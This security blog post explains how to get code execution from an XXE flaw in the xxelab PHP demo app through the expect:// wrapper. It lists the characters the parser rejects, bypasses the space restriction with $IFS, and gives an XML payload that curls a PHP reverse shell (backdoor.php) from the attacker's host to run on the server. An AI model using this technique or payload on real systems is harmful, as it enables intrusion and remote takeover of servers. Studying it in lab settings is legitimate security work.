From XXE to RCE with PHP/expect — The Missing Link

3 min readJun 7, 2019

I’ve been experimenting with xxelab (, a simple PHP web app demonstrating XXE attacks, trying to replicate code execution through expect:// PHP wrapper. (Shameless plug — my recently submitted pull request allows you to run xxelab in a Docker container). This technique is well described in a number of articles on the Internet, for example here:

Or here:

The idea is that you provide a reference to expect://id pseudo URI for the XML external entity, and PHP will execute id and return the output of the command for external entity substitution.

Turns out it was quite a lot of work to get from that to a “useful” code execution. The problem is, PHP’s XML parser will error out if you have spaces in the expect pseudo URI, i.e. when providing arguments for the command. You might see something like this in the error log when trying expect://echo BLAH:

DOMDocument::loadXML(): Invalid URI: expect://echo BLAH in Entity, line: 2

What I Found

Firstly, in addition to spaces, the following characters will be rejected with the “Invalid URI” error message similar to above (this might not be an exhaustive list):

" - double quotes
{ } - curly braces
| - "pipe"
\ - backslash
< > - angle brackets
: - colon

The following characters work fine:

' - single quote
; - semicolon
( ) - brackets
$ - dollar sign

This makes it hard to pass arguments to commands, redirect output, or use shell pipes.

When constructing expect:// pseudo URLs for external entity reference in XML you shouldn’t URL encode the string (it is interpreted literally). So using %20 or + instead of space doesn’t work, and neither does XML encoding like &#x20; or &#32;.

Making It Work

One workaround that I found uses the $IFS built-in variable in sh and relies on the fact that the dollar sign is accepted. The core technique is to replace any spaces in your command with $IFS. In some cases this needs to be combined with the use of single quotes when a space needs to be followed by alphanumeric characters (so that they are not interpreted as a part of the variable name). Here’s a couple examples:

cat /tmp/BLAH becomes cat$IFS/tmp/BLAH

echo BLAH becomes echo$IFS'BLAH'

curl -O becomes curl$IFS-O$IFS''
(: would not be allowed, but curl assumes it is http if you omit http://)

Using these, a possible way to get a reverse shell using XXE would be to upload a PHP reverse shell and then execute it using your browser. Here’s a full example that works in xxelab (replace with your IP and serve backdoor.php using python3 -m http.server):

<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE root [
<!ENTITY file SYSTEM "expect://curl$IFS-O$IFS''">

Note that : is not rejected in this case, it looks like colon is allowed if followed by a number and a forward slash, which likely looks like a port spec for the URI parser. By using &file; in the email tag you will see the output of the curl command when submitting the request in xxelab.




Random rumblings about #InfoSec. The opinions expressed here are my own and not necessarily those of my employer.